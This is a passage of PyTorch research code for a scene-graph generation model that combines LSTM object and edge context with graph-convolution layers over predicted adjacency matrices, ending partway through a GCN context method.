def __init__(self, classes, rel_classes, mode='sgdet',
embed_dim=200, hidden_dim=256, obj_dim=2048, pooling_dim=2048,
nl_mul=0, nl_obj=2, nl_obj_gcn=2, nl_edge=2, nl_adj=1, dropout_rate=0.2, order='confidence',
pass_in_obj_feats_to_decoder=True,
pass_in_obj_feats_to_edge=True,
pass_in_obj_feats_to_gcn=False,
pass_embed_togcn=False,
attention_dim=256, with_adj_mat=False,
max_num_obj=65, adj_embed_dim=256, mean_union_feat=False, adj_embed=False,
ch_res=False, use_bias=True, use_tanh=True,
limit_vision=True, use_vision=True,
bg_num_rel=-1, bg_num_graph=-1,
with_gcn=False, fb_thr=0.5, with_biliner_score=False,
gcn_adj_type='hard', num_gcn_layer=1, relu_alpha=0.2,
nhead=4, where_gcn=False, with_gt_adj_mat=False, type_gcn='normal',
edge_ctx_type='obj', nms_union=False):
super(LinearizedContext, self).__init__()
self.classes = classes
self.rel_classes = rel_classes
assert mode in MODES
self.mode = mode
self.attention_dim = attention_dim
self.nl_mul = nl_mul
self.nl_obj = nl_obj
self.nl_obj_gcn = nl_obj_gcn
self.nl_adj = nl_adj
self.nl_edge = nl_edge
self.with_adj_mat = with_adj_mat
self.embed_dim = embed_dim
self.hidden_dim = hidden_dim
self.obj_dim = obj_dim
self.pooling_dim = pooling_dim
self.dropout_rate = dropout_rate
self.pass_in_obj_feats_to_decoder = pass_in_obj_feats_to_decoder
self.pass_in_obj_feats_to_edge = pass_in_obj_feats_to_edge
self.pass_in_obj_feats_to_gcn = pass_in_obj_feats_to_gcn
self.pass_embed_togcn = pass_embed_togcn
self.max_num_obj = max_num_obj
self.adj_embed_dim = adj_embed_dim
self.mean_union_feat = mean_union_feat
self.adj_embed = adj_embed
self.ch_res = ch_res
self.use_bias = use_bias
self.use_vision = use_vision
self.use_tanh = use_tanh
self.limit_vision=limit_vision
self.with_gcn = with_gcn
self.fb_thr = fb_thr
self.relu_alpha = relu_alpha
self.with_biliner_score = with_biliner_score
self.gcn_adj_type = gcn_adj_type
self.num_gcn_layer = num_gcn_layer
self.nhead = nhead
self.where_gcn = where_gcn
self.with_gt_adj_mat = with_gt_adj_mat
self.type_gcn = type_gcn
self.edge_ctx_type = edge_ctx_type
self.nms_union = nms_union
assert order in ('size', 'confidence', 'random', 'leftright')
self.order = order
if self.mode == 'predcls_nongtbox':
self.order = 'random'
# EMBEDDINGS
#self.leakyrelu = nn.LeakyReLU(self.alpha)
embed_vecs = obj_edge_vectors(self.classes, wv_dim=self.embed_dim)
self.obj_embed = nn.Embedding(self.num_classes, self.embed_dim)
self.obj_embed.weight.data = embed_vecs.clone()
self.obj_embed2 = nn.Embedding(self.num_classes, self.embed_dim)
self.obj_embed2.weight.data = embed_vecs.clone()
if self.pass_embed_togcn:
self.obj_embed3 = nn.Embedding(self.num_classes, self.embed_dim)
self.obj_embed3.weight.data = embed_vecs.clone()
# This probably doesn't help it much
self.pos_embed = nn.Sequential(*[
nn.BatchNorm1d(4, momentum=BATCHNORM_MOMENTUM / 10.0),
nn.Linear(4, 128),
nn.ReLU(inplace=True),
nn.Dropout(0.1),
])
if self.nl_mul > 0:
self.mul_rnn = MultiLabelRNN(self.classes, embed_dim=self.embed_dim,
inputs_dim=pooling_dim,
hidden_dim=self.hidden_dim,
recurrent_dropout_probability=dropout_rate)
if self.nl_obj > 0 and self.mode != 'predcls_nongtbox':
obj_ctx_rnn_indim = self.obj_dim + self.embed_dim + 128
if self.with_gcn and self.where_gcn == 'stack':
obj_ctx_rnn_indim = self.obj_dim + self.embed_dim + 128
self.obj_ctx_rnn = AlternatingHighwayLSTM(
input_size=obj_ctx_rnn_indim,
hidden_size=self.hidden_dim,
num_layers=self.nl_obj,
recurrent_dropout_probability=dropout_rate)
decoder_inputs_dim = self.hidden_dim
if self.pass_in_obj_feats_to_decoder:
decoder_inputs_dim += self.obj_dim + self.embed_dim +128
if self.with_gcn :
decoder_inputs_dim = decoder_inputs_dim + self.hidden_dim
self.decoder_rnn = DecoderRNN(self.classes, embed_dim=self.embed_dim,
inputs_dim=decoder_inputs_dim,
hidden_dim=self.hidden_dim,
recurrent_dropout_probability=dropout_rate,
mode=self.mode)
if self.nl_obj == 0 or self.with_gcn:
obj_gcn_input_dim = self.obj_dim + self.embed_dim + 128
if self.where_gcn == 'stack':
obj_gcn_input_dim = self.hidden_dim
print('building obj gcn!')
self.obj_gc1 = GraphConvolution(obj_gcn_input_dim, self.hidden_dim)
#self.obj_gc1_re = gcn_layer(obj_gcn_input_dim, self.hidden_dim)
#self.obj_gc2 = gcn_layer(self.hidden_dim, self.hidden_dim)
#self.obj_gc2_re = gcn_layer(self.hidden_dim, self.hidden_dim)
#self.obj_gc1_fb = gcn_layer(self.obj_dim + self.embed_dim + 128, self.hidden_dim)
#self.obj_gc_obj2linear = nn.Linear(obj_gcn_input_dim,self.hidden_dim)
#self.obj_gc_obj2linear.weight = torch.nn.init.xavier_normal(self.obj_gc_obj2linear.weight, gain=1.0)
if self.nl_obj == 0:
self.decoder_lin = nn.Linear(self.hidden_dim, self.num_classes)
self.decoder_lin.weight = torch.nn.init.xavier_normal(self.decoder_lin.weight, gain=1.0)
if self.with_adj_mat:
if self.nl_adj > 0:
adj_input_dim = self.obj_dim + self.embed_dim + 128 + int(self.obj_dim/2)
if ch_res:
adj_input_dim = adj_input_dim + self.hidden_dim
self.adj_mat_rnn = AlternatingHighwayLSTM(input_size=adj_input_dim,
hidden_size=self.hidden_dim,
num_layers=self.nl_adj,
recurrent_dropout_probability=dropout_rate)
self.adj_mat_embed_decoder = nn.Linear(self.hidden_dim, self.adj_embed_dim)
self.adj_mat_lin = nn.Linear(self.adj_embed_dim, 2)
self.adj_mat_embed_encoder = nn.Linear(self.max_num_obj, self.adj_embed_dim)
self.feat_adj_mat_lin = nn.Linear(self.obj_dim, self.adj_embed_dim)
if (self.with_adj_mat and not self.with_gt_adj_mat) or self.type_gcn == 'gat':
if self.nl_obj > 0:
post_lstm_in = self.hidden_dim
if self.with_gcn and self.where_gcn == 'parall':
post_lstm_in = post_lstm_in + self.hidden_dim
elif self.with_gcn and self.where_gcn == 'stack':
post_lstm_in = self.hidden_dim
self.post_lstm_graph_obj = nn.Linear(post_lstm_in, self.pooling_dim)
self.post_lstm_graph_sub = nn.Linear(post_lstm_in, self.pooling_dim)
'''
self.post_lstm_graph_obj.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_lstm_graph_obj.bias.data.zero_()
self.post_lstm_graph_sub.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_lstm_graph_sub.bias.data.zero_()
'''
self.post_lstm_graph_obj.weight = torch.nn.init.xavier_normal(self.post_lstm_graph_obj.weight, gain=1.0)
self.post_lstm_graph_sub.weight = torch.nn.init.xavier_normal(self.post_lstm_graph_sub.weight, gain=1.0)
post_lstm_dim = self.hidden_dim
if self.with_gcn and self.where_gcn == 'parall':
post_lstm_dim = self.pooling_dim + self.embed_dim + 128
elif self.with_gcn and self.where_gcn == 'stack':
post_lstm_dim = self.hidden_dim
self.post_lstm_graph_obj_1 = nn.Linear(post_lstm_dim, self.pooling_dim)
self.post_lstm_graph_sub_1 = nn.Linear(post_lstm_dim, self.pooling_dim)
'''
self.post_lstm_graph_obj_1.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_lstm_graph_obj_1.bias.data.zero_()
self.post_lstm_graph_sub_1.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_lstm_graph_sub_1.bias.data.zero_()
'''
self.post_lstm_graph_obj_1.weight = torch.nn.init.xavier_normal(self.post_lstm_graph_obj_1.weight, gain=1.0)
self.post_lstm_graph_sub_1.weight = torch.nn.init.xavier_normal(self.post_lstm_graph_sub_1.weight, gain=1.0)
if self.nl_obj == 0:
self.post_lstm_graph = nn.Linear(self.pooling_dim + self.embed_dim + 128, self.pooling_dim * 2)
# Initialize to sqrt(1/2n) so that the outputs all have mean 0 and variance 1.
# (Half contribution comes from LSTM, half from embedding.
# In practice the pre-lstm stuff tends to have stdev 0.1 so I multiplied this by 10.
self.post_lstm_graph.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_lstm_graph.bias.data.zero_()
if self.with_biliner_score:
self.graph_bilinear = nn.Linear(self.pooling_dim, 2, bias=False)
self.graph_bilinear.weight = torch.nn.init.xavier_normal(self.graph_bilinear.weight, gain=1.0)
self.graph_bilinear_1 = nn.Linear(self.pooling_dim, 2, bias=False)
self.graph_bilinear_1.weight = torch.nn.init.xavier_normal(self.graph_bilinear_1.weight, gain=1.0)
else :
self.rel_compress_graph = nn.Linear(self.pooling_dim, 2, bias=True)
self.rel_compress_graph.weight = torch.nn.init.xavier_normal(self.rel_compress_graph.weight, gain=1.0)
if self.use_bias:
self.freq_bias_graph = FrequencyBias(graph=True, with_bg=bg_num_graph!=0)
if self.mode == 'detclass':
return
if self.nl_edge > 0:
input_dim = self.embed_dim
if self.nl_obj > 0 and self.mode != 'predcls_nongtbox':
input_dim += self.hidden_dim
else:
input_dim += self.obj_dim + self.embed_dim + 128
if self.pass_in_obj_feats_to_edge:
input_dim += self.obj_dim
if self.ch_res:
input_dim += self.hidden_dim
if self.with_gcn:
input_dim += self.hidden_dim
if self.edge_ctx_type == 'union':
input_dim = 2 * self.embed_dim + self.pooling_dim
#if self.with_adj_mat:
# input_dim += self.adj_embed_dim
if self.mode == 'predcls_nongtbox':
self.obj_feat_att = nn.Linear( self.obj_dim + self.embed_dim + 128, self.attention_dim)
self.obj_label_att = nn.Linear( self.embed_dim, self.attention_dim)
#self.obj_feat_label_att = nn.Linear( self.obj_dim + self.embed_dim + 128+self.embed_dim, self.attention_dim)
self.att_weight = nn.Linear(self.attention_dim, 1)
#print('input_dim: ',input_dim)
self.edge_ctx_rnn = AlternatingHighwayLSTM(input_size=input_dim,
hidden_size=self.hidden_dim,
num_layers=self.nl_edge,
recurrent_dropout_probability=dropout_rate)
if self.edge_ctx_type == 'union':
decoder_inputs_dim = 3 * self.hidden_dim
self.decoder_edge_rnn = DecoderRNN(self.rel_classes, embed_dim=self.embed_dim,
inputs_dim=decoder_inputs_dim,
hidden_dim=self.hidden_dim,
recurrent_dropout_probability=dropout_rate,
type=self.edge_ctx_type)
'''
self.decoder_edge_linear = nn.Linear(decoder_inputs_dim, self.num_rels, bias=True)
self.decoder_edge_linear.weight = torch.nn.init.xavier_normal(self.decoder_edge_linear.weight, gain=1.0)
'''
if self.with_gcn:
print('building gcn! number layers',self.num_gcn_layer)
gcn_input_dim = self.hidden_dim
if self.where_gcn == 'parall':
gcn_input_dim += self.hidden_dim
if self.pass_embed_togcn:
gcn_input_dim += self.embed_dim
if self.pass_in_obj_feats_to_gcn:
gcn_input_dim += self.obj_dim + self.embed_dim + 128
self.gc_list = []
self.gc_re_list = []
self.gc2_list = []
self.gc2_re_list = []
''' '''
for i in range(self.num_gcn_layer):
self.gc_list.append(GraphConvolution(gcn_input_dim, self.hidden_dim))
#self.gc_re_list.append(gcn_layer(gcn_input_dim, self.hidden_dim))
'''
self.gc2_list.append(gcn_layer(hidden_dim, self.hidden_dim))
self.gc2_re_list.append(gcn_layer(hidden_dim, self.hidden_dim))
'''
self.gc = nn.Sequential(*self.gc_list)
#self.gc_re = nn.Sequential(*self.gc_re_list)
'''
self.gc2 = nn.Sequential(*self.gc2_list)
self.gc2_re = nn.Sequential(*self.gc2_re_list)
'''
self.gcn_input_dim = gcn_input_dim
def sort_rois(self, batch_idx, confidence, box_priors):
"""
:param batch_idx: tensor with what index we're on
:param confidence: tensor with confidences between [0,1)
:param boxes: tensor with (x1, y1, x2, y2)
:return: Permutation, inverse permutation, and the lengths transposed (same as _sort_by_score)
"""
cxcywh = center_size(box_priors)
if self.order == 'size':
sizes = cxcywh[:,2] * cxcywh[:, 3]
# sizes = (box_priors[:, 2] - box_priors[:, 0] + 1) * (box_priors[:, 3] - box_priors[:, 1] + 1)
assert sizes.min() > 0.0
scores = sizes / (sizes.max() + 1)
elif self.order == 'confidence':
scores = confidence
elif self.order == 'random':
scores = torch.FloatTensor(np.random.rand(batch_idx.size(0))).cuda(batch_idx.get_device())
elif self.order == 'leftright':
centers = cxcywh[:,0]
scores = centers / (centers.max() + 1)
else:
raise ValueError("invalid mode {}".format(self.order))
return _sort_by_score(batch_idx, scores)
@property
def num_classes(self):
return len(self.classes)
@property
def num_rels(self):
return len(self.rel_classes)
def convert_symmat(self, adj):
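        # Symmetrize a (possibly soft) adjacency: the result is the elementwise max of adj and its transpose,
        # so an edge predicted in either direction is kept for both directions.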
adj_union = (adj.permute(1, 0) > adj).type_as(adj)
adj = adj + (adj.permute(1,0)).mul(adj_union) - adj.mul(adj_union)
return adj
def edge_ctx(self, obj_feats, obj_dists, im_inds, obj_preds, box_priors=None):
"""
Object context and object classification.
:param obj_feats: [num_obj, img_dim + object embedding0 dim]
:param obj_dists: [num_obj, #classes]
:param im_inds: [num_obj] the indices of the images
:return: edge_ctx: [num_obj, #feats] For later!
"""
# Only use hard embeddings
obj_embed2 = self.obj_embed2(obj_preds)
inp_feats = torch.cat((obj_embed2, obj_feats), 1)
# Sort by the confidence of the maximum detection.
confidence = F.softmax(obj_dists, dim=1).data.view(-1)[
obj_preds.data + arange(obj_preds.data) * self.num_classes]
perm, inv_perm, ls_transposed = self.sort_rois(im_inds.data, confidence, box_priors)
#print('inp_feats: ',inp_feats.size())
edge_input_packed = PackedSequence(inp_feats[perm], ls_transposed)
edge_reps = self.edge_ctx_rnn(edge_input_packed)[0][0]
# now we're good! unperm
edge_ctx = edge_reps[inv_perm]
return edge_ctx
def obj_ctx(self, obj_feats, obj_dists, im_inds, obj_labels=None, box_priors=None, boxes_per_cls=None,
obj_ctx_gcn=None, rel_inds=None, rel_inds_offset=None,
union_feat=None, label_prior=None):
"""
Object context and object classification.
:param obj_feats: [num_obj, img_dim + object embedding0 dim]
:param obj_dists: [num_obj, #classes]
:param im_inds: [num_obj] the indices of the images
:param obj_labels: [num_obj] the GT labels of the image
:param boxes: [num_obj, 4] boxes. We'll use this for NMS
:return: obj_dists: [num_obj, #classes] new probability distribution.
obj_preds: argmax of that distribution.
obj_final_ctx: [num_obj, #feats] For later!
"""
# Sort by the confidence of the maximum detection.
confidence = F.softmax(obj_dists, dim=1).data[:, 1:].max(1)[0]
perm, inv_perm, ls_transposed = self.sort_rois(im_inds.data, confidence, box_priors)
# Pass object features, sorted by score, into the encoder LSTM
obj_inp_rep = obj_feats[perm].contiguous()
input_packed = PackedSequence(obj_inp_rep, ls_transposed)
encoder_rep = self.obj_ctx_rnn(input_packed)[0][0]
# Decode in order
adj_dis_softmax_obj = None
if self.with_gcn and self.where_gcn == 'parall':
obj_ctx_gcn = obj_ctx_gcn[perm].contiguous()
encoder_rep = torch.cat([obj_ctx_gcn, encoder_rep], -1)
adj_dist_owbias_obj = None
if self.with_gcn and self.where_gcn == 'stack':
encoder_rep_r = encoder_rep[inv_perm]
adj_pre = encoder_rep_r
if self.mode == 'sgdet':
#adj_obj_preds = obj_dists.max(1)[1]
if self.training:
#print('obj_labels', obj_labels)
adj_obj_preds = obj_labels.clone()
nonzero_pred = obj_dists[:, 1:].max(1)[1] + 1
is_bg = (adj_obj_preds.data == 0).nonzero()
if is_bg.dim() > 0:
adj_obj_preds[is_bg.squeeze(1)] = nonzero_pred[is_bg.squeeze(1)]
#print('obj_preds',obj_preds)
else:
adj_obj_preds = label_prior
#print('obj_preds', obj_preds)
'''
if self.training:
adj_obj_preds = obj_labels.clone()
else:
adj_obj_preds = obj_dists.max(1)[1]
'''
else:
if self.training or self.mode == 'predcls':
adj_obj_preds = obj_labels
else:
adj_obj_preds = obj_dists[:, 1:].max(1)[1] + 1
adj_dist_owbias_obj = self.from_pre_to_mat(obj_pre=adj_pre, sub_pre=adj_pre, rel_inds_graph=rel_inds,
vr_graph=union_feat,
rel_inds_offset_graph=rel_inds_offset,
obj_preds=adj_obj_preds, num=1)
adj_dis_softmax_obj = F.softmax(adj_dist_owbias_obj, -1)[:, 1]
obj_ctx_gcn \
= self.obj_gcn(encoder_rep_r,
im_inds=im_inds,
rel_inds=rel_inds,
adj_mat=adj_dis_softmax_obj
)
obj_ctx_gcn = obj_ctx_gcn[perm].contiguous()
encoder_rep = torch.cat([obj_ctx_gcn, encoder_rep], -1)
decoder_inp = PackedSequence(torch.cat((obj_inp_rep, encoder_rep), 1) if self.pass_in_obj_feats_to_decoder else encoder_rep,
ls_transposed)
#print(decoder_inp.size())
#print('obj_labels: ',obj_labels)
obj_dists, obj_preds_nozeros, obj_preds_zeros, decoder_rep = self.decoder_rnn(
decoder_inp, #obj_dists[perm],
labels=obj_labels[perm] if obj_labels is not None else None,
boxes_for_nms=boxes_per_cls[perm] if boxes_per_cls is not None else None,
obj_dists=obj_dists[perm],
)
obj_preds_nozeros = obj_preds_nozeros[inv_perm]
obj_preds_zeros = obj_preds_zeros[inv_perm]
#print('obj_preds: ', obj_preds)
obj_dists = obj_dists[inv_perm]
decoder_rep = decoder_rep[inv_perm]
if self.mode == 'predcls':
assert obj_labels is not None
obj_preds = obj_labels
obj_dists = Variable(to_onehot(obj_preds.data, self.num_classes))
decoder_rep = decoder_rep
obj_preds_nozeros = obj_preds
obj_preds_zeros = obj_preds
encoder_rep = encoder_rep[inv_perm]
return obj_dists, obj_preds_nozeros, obj_preds_zeros, encoder_rep, decoder_rep, adj_dist_owbias_obj
def obj_gcn(self, obj_feats, im_inds, rel_inds, adj_mat, num_layer=0,
obj_labels=None, box_priors=None, boxes_per_cls=None):
if self.gcn_adj_type == 'hard':
adj_mat_t = adj_mat > self.fb_thr + 0.01
adj_mat_t = adj_mat_t.type_as(obj_feats)
if self.gcn_adj_type == 'soft':
adj_mat_t = adj_mat
spare_adj_mat = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(obj_feats.get_device(), async=True)
spare_adj_mat = Variable(spare_adj_mat)
spare_adj_mat[rel_inds[:, 1], rel_inds[:, 2]] = adj_mat_t
spare_adj_mat = self.convert_symmat(spare_adj_mat)
spare_adj_mat = self.adj_to_Laplacian(spare_adj_mat, type=self.gcn_adj_type)
x = F.elu(self.obj_gc1(obj_feats, spare_adj_mat))
x = F.dropout(x, self.dropout_rate, training=self.training)
'''
spare_adj_mat_re = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(obj_feats.get_device(), async=True)
spare_adj_mat_re = Variable(spare_adj_mat_re)
spare_adj_mat_re[rel_inds[:, 2], rel_inds[:, 1]] = adj_mat_t
spare_adj_mat_re = self.adj_to_Laplacian(spare_adj_mat_re, type=self.gcn_adj_type)
x_re = F.relu(self.obj_gc1_re(obj_feats, spare_adj_mat_re))
x_re = F.dropout(x_re, self.dropout_rate, training=self.training)
'''
'''
x = F.relu(self.obj_gc2(x, spare_adj_mat))
x = F.dropout(x, self.dropout_rate, training=self.training)
x_re = F.relu(self.obj_gc2_re(x_re, spare_adj_mat_re))
x_re = F.dropout(x_re, self.dropout_rate, training=self.training)
'''
return x
def gen_adj_pre(self, obj_feats, obj_dists, im_inds, box_priors=None, use_bias=True):
adj_mat = None
'''
offset_num = []
num_imgs = rel_inds[:,0]
max_num_imgs = num_imgs.cpu().numpy().max()
max_num_imgs = int(max_num_imgs) + 1
rel_img_inds = num_imgs
img_id = torch.arange(max_num_imgs)
offset_id = torch.zeros_like(img_id)
id_ind_mat = im_inds[:,None] == im_inds[None,:]
rel_ind_mat = rel_img_inds[:,None] == rel_img_inds[None,:]
id_ind_mat = id_ind_mat.type_as(img_id)
num_per_imgs = id_ind_mat.sum(0)
offset_id[1:] = num_per_imgs[:-2]
offset_ind = rel_ind_mat * offset_id[None,:]
offset_ind = offset_ind.sum(1)
imd_ind_mat = im_inds[:,None] == im_inds[None, :]
imd_ind_mat = imd_ind_mat.type_as(obj_feats)
obj_rep = self.adj_mat_embed_decoder(obj_rep)
obj_rep = F.relu(obj_rep,True)
obj_rep_union = obj_rep[:,None,:] * obj_rep[None,:,:] * imd_ind_mat[:,:,None]
feat_adj_union = self.feat_adj_mat_lin(union_feat)
feat_adj_union = F.relu(feat_adj_union,True)
feat_adj_union_mat = torch.zeros_like(obj_rep_union)
feat_adj_union_mat[rel_inds[:,1],rel_inds[:,2],:] = feat_adj_union
feat_adj_union_mat = imd_ind_mat[:,:,None] * feat_adj_union_mat
adj_rep_union = obj_rep_union + feat_adj_union_mat
adj_mat_batch_id = self.adj_mat_lin(adj_rep_union)
#adj_mat_batch_id = F.softmax(adj_mat_batch_id, -1)
adj_mat_t = torch.zeros([adj_mat_batch_id.size(0),self.max_num_obj,2]).cuda(adj_mat_batch_id.get_device(),async=True)
adj_mat = torch.autograd.Variable(adj_mat_t)
adj_mat[rel_inds[:,1],rel_inds_offset[:,2]] = adj_mat_batch_id[rel_inds[:,1],rel_inds[:,2],]
'''
#adj_mat = F.sigmoid(adj_mat)
confidence = F.softmax(obj_dists, dim=1).data[:, 1:].max(1)[0]
perm, inv_perm, ls_transposed = self.sort_rois(im_inds.data, confidence, box_priors)
# Pass object features, sorted by score, into the encoder LSTM
obj_inp_rep = obj_feats[perm].contiguous()
input_packed = PackedSequence(obj_inp_rep, ls_transposed)
obj_rep = self.adj_mat_rnn(input_packed)[0][0]
adj_mat = obj_rep[inv_perm]
return adj_mat
def from_pre_to_mat(self, obj_pre, sub_pre, rel_inds_graph, vr_graph, rel_inds_offset_graph, \
obj_preds, num=0):
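        # Scores every candidate pair with a 2-way (no edge / edge) classifier: subject and object contexts
        # are projected to pooling_dim, gated by the union-box visual feature when use_vision is set,
        # combined with a Hadamard product + linear ("bilinear") score, and optionally offset by the
        # class-pair frequency bias.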
if num == 0:
subj_rep_graph = self.post_lstm_graph_sub(sub_pre)
obj_rep_graph = self.post_lstm_graph_obj(obj_pre)
if num == 1:
subj_rep_graph = self.post_lstm_graph_sub_1(sub_pre)
obj_rep_graph = self.post_lstm_graph_obj_1(obj_pre)
subj_rep_graph = F.dropout(subj_rep_graph, self.dropout_rate, training=self.training)
obj_rep_graph = F.dropout(obj_rep_graph, self.dropout_rate, training=self.training)
obj_rel_ind_graph = rel_inds_graph
vr_obj_graph = vr_graph
subj_rep_graph_rel = subj_rep_graph[rel_inds_graph[:, 1]]
obj_rep_graph_rel = obj_rep_graph[rel_inds_graph[:, 2]]
#prod_rep_graph = subj_rep_graph_rel * obj_rep_graph_rel
if self.use_vision:
if self.mode != 'predcls_nongtbox':
#prod_rep_graph = prod_rep_graph
subj_rep_graph_rel = subj_rep_graph_rel
obj_rep_graph_rel = obj_rep_graph_rel
if self.limit_vision:
# exact value TBD
subj_rep_graph_rel = torch.cat((subj_rep_graph_rel[:,:self.pooling_dim] * vr_obj_graph[:,:self.pooling_dim], subj_rep_graph_rel[:,self.pooling_dim:]), 1)
obj_rep_graph_rel = torch.cat((obj_rep_graph_rel[:,:self.pooling_dim] * vr_obj_graph[:,:self.pooling_dim], obj_rep_graph_rel[:,self.pooling_dim:]), 1)
else:
subj_rep_graph_rel = subj_rep_graph_rel * vr_obj_graph[:,:self.pooling_dim]
obj_rep_graph_rel = obj_rep_graph_rel * vr_obj_graph[:, :self.pooling_dim]
if self.use_tanh:
#prod_rep_graph = F.tanh(prod_rep_graph)
subj_rep_graph_rel = F.tanh(subj_rep_graph_rel)
obj_rep_graph_rel = F.tanh(obj_rep_graph_rel)
if self.with_biliner_score:
rel_dists_graph = self.bilinear_score_graph(subj_rep_graph_rel, obj_rep_graph_rel, num)
else:
prod_rep_graph = subj_rep_graph_rel * obj_rep_graph_rel
rel_dists_graph = self.rel_compress_graph(prod_rep_graph)
if self.use_bias:
rel_dists_graph = rel_dists_graph + self.freq_bias_graph.index_with_labels(torch.stack((
obj_preds[obj_rel_ind_graph[:, 1]],
obj_preds[obj_rel_ind_graph[:, 2]],
), 1))
'''
rel_dists_graph = rel_dists_graph + F.dropout(self.freq_bias_graph.index_with_labels(torch.stack((
obj_preds[obj_rel_ind_graph[:, 1]],
obj_preds[obj_rel_ind_graph[:, 2]],
), 1)),self.dropout_rate, training=self.training)
'''
rel_dists_graph = rel_dists_graph
#adj_mat_t = torch.zeros([adj_pre.size(0),self.max_num_obj,2]).cuda(rel_dists_graph.get_device(),async=True)
#pre_adj_mat = Variable(adj_mat_t)
#pre_adj_mat[rel_inds_graph[:,1],rel_inds_offset_graph[:,2]] = rel_dists_graph
return rel_dists_graph
def adj_to_Laplacian_spare(self, adj_mat):
eye_mat = torch.ones([1,adj_mat.size(0)])
eye_coo = torch.arange(adj_mat.size(0))
eye_coo = torch.cat([eye_coo[:,None],eye_coo[:,None]], -1)
spare_eye_mat = torch.sparse.FloatTensor(eye_coo, eye_mat, \
torch.Size([adj_mat.size(0), adj_mat.size(0)])).cuda(
adj_mat.get_device(), async=True)
adj_mat = adj_mat + spare_eye_mat
'''
degree_mat = torch.dot(adj_mat, adj_mat_t) * eye_mat
degree_mat_re = 1 / (degree_mat + 1e-8) * eye_mat
degree_mat_re = degree_mat_re ** (0.5)
'''
degree_mat = adj_mat.sum(-1)
degree_mat_re = 1 / (degree_mat + 1e-8)
dot_1 = degree_mat_re[:,None] * adj_mat
#print(dot_1.size(),degree_mat_re.size(),adj_mat.size())
return dot_1
def adj_to_Laplacian(self, adj_mat, type='hard'):
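        # Returns a row-normalized adjacency with self-loops, i.e. D^-1 (A + I) -- the "random walk"
        # normalization rather than the symmetric D^-1/2 (A + I) D^-1/2 form. The `type` argument is
        # currently unused here.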
eye_mat = torch.eye(adj_mat.size(0)).cuda(adj_mat.get_device(),async=True)
eye_mat = Variable(eye_mat)
adj_mat = adj_mat + eye_mat
'''
degree_vec = adj_mat.sum(-1)
#degree_vec = torch.sqrt(degree_vec)
degree_mat_re_vec = (1 / (degree_vec + 1e-8))
degree_vec_r = adj_mat.sum(0)
#degree_vec_r = torch.sqrt(degree_vec_r)
degree_mat_re_vec_r = (1 / (degree_vec_r + 1e-8))
degree_mat_re = torch.zeros_like(adj_mat)
degree_mat_re_r = torch.zeros_like(adj_mat)
i = np.arange(adj_mat.size(0))
degree_mat_re[i,i] = degree_mat_re_vec
degree_mat_re_r[i,i] = degree_mat_re_vec_r
#adj_mat_L = degree_mat_re - adj_mat
dot_1 = (degree_mat_re @ adj_mat) @ degree_mat_re_r
#dot_1 = degree_mat_re @ adj_mat
'''
degree_mat = adj_mat.sum(-1)
degree_mat_re = 1 / (degree_mat + 1e-8)
dot_1 = degree_mat_re[:,None] * adj_mat
#print(dot_1.size(),degree_mat_re.size(),adj_mat.size())
return dot_1
def gcn_ctx(self, ctx_feat, adj_mat, im_inds, rel_inds, num_layer=0, obj_preds=None,
rel_inds_offset=None):
'''
Args:
ctx_feat:
adj_mat:
im_inds:
rel_inds:
rel_inds_offset:
Returns:
'''
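        # Sketch of the current behaviour: threshold (hard) or keep (soft) the predicted edge probabilities,
        # scatter them into a dense NxN adjacency, symmetrize and row-normalize it, then apply one
        # GraphConvolution layer. The reverse-direction branch is commented out, so the two returned
        # tensors are currently identical.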
'''
if adj_mat is None:
spare_value = torch.ones([rel_inds.size(0),rel_inds.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_value = Variable(spare_value)
else:
spare_value = adj_mat > self.fb_thr
spare_value = spare_value.type_as(ctx_feat)
spare_value = spare_value[rel_inds[:,1],rel_inds_offset[:,2]]
#spare_value = spare_value
spare_adj_mat = torch.sparse.FloatTensor(rel_inds[1:3],spare_value, \
torch.Size([im_inds.size(0),im_inds.size(0)]))
spare_adj_mat_re = torch.sparse.FloatTensor(rel_inds[1:3][:,::-1], spare_value, \
torch.Size([im_inds.size(0), im_inds.size(0)]))
coo_rel = torch.where(adj_mat > self.fb_thr + 0.01)
ones_rel = torch.ones([1, coo_rel.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat = torch.sparse.FloatTensor(coo_rel[0:2], ones_rel, \
torch.Size([im_inds.size(0),im_inds.size(0)])).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat_re = torch.sparse.FloatTensor(coo_rel[0:2][:, ::-1], ones_rel, \
torch.Size([im_inds.size(0), im_inds.size(0)])).cuda(ctx_feat.get_device(),async=True)
adj_mat_t = adj_mat > self.fb_thr + 0.01
adj_mat_t = adj_mat_t.type_as(ctx_feat)
spare_adj_mat = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat_re = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat = Variable(spare_adj_mat)
spare_adj_mat_re = Variable(spare_adj_mat_re)
spare_adj_mat[rel_inds[:,1],rel_inds[:,2]] = adj_mat_t[rel_inds[:,1],rel_inds[:,2]]
spare_adj_mat_re[rel_inds[:, 2], rel_inds[:, 1]] = adj_mat_t[rel_inds[:, 1], rel_inds[:, 2]]
spare_adj_mat = self.adj_to_Laplacian(spare_adj_mat)
spare_adj_mat_re = self.adj_to_Laplacian(spare_adj_mat_re)
'''
if self.gcn_adj_type == 'hard':
adj_mat_t = adj_mat > self.fb_thr + 0.01
adj_mat_t = adj_mat_t.type_as(ctx_feat)
if self.gcn_adj_type == 'soft':
adj_mat_t = adj_mat
#pred_embed = self.obj_embed2(obj_preds)
spare_adj_mat = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat = Variable(spare_adj_mat)
spare_adj_mat[rel_inds[:,1],rel_inds[:,2]] = adj_mat_t
spare_adj_mat = self.convert_symmat(spare_adj_mat)
spare_adj_mat = self.adj_to_Laplacian(spare_adj_mat,type=self.gcn_adj_type)
